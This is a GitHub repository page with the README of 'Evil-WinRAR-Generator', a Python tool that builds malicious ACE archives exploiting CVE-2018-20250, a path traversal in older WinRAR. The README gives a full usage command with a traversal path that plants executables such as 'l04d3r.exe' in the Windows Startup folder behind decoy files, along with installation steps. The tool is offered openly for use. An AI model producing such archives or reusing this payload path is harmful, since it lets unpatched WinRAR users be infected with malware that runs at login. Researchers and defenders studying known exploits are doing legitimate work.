Skip to content
Generator of malicious Ace files for WinRAR < 5.70 beta 1
Python
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
LICENSE Initial commit Feb 26, 2019
README.md Update README.md and evilWinRAR.py Jul 26, 2019
evilWinRAR.py Update README.md and evilWinRAR.py Jul 26, 2019
requirements.txt Add files via upload Feb 26, 2019

README.md

Evil-WinRAR-Generator

Python 3.6 License: GPL v3 Twitter

Generator of malicious Ace files for WinRAR < 5.70 beta 1

Vulnerability by research.checkpoint.com

Developed by @manulqwerty - IronHackers.

Usage

Help:

./evilWinRAR.py -h

Generate a malicius archive:

Rar filename: evil.rar

Evil path: C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

Evil files: calc.exe , l04d3r.exe

Good files: hello.txt , cats.jpeg

./evilWinRAR.py -o evil.rar -e calc.exe l04d3r.exe -g hello.txt cats.jpeg -p 'C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'

Instalation

You can download Evil-WinRAR-Generator by cloning the Git repository:

git clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen && pip3 install -r requirements.txt
chmod +x evilWinRAR.py

Evil-WinRAR-Generator works out of the box with Python version 3.x on any platform.

Proof of Concept (CVE-2018-20250)

IMAGE ALT TEXT HERE

Screenshots

Screenshot Screenshot

Credits

https://github.com/droe/acefile

https://github.com/WyAtu/CVE-2018-20250

Colaborators:

cybervaca

You can’t perform that action at this time.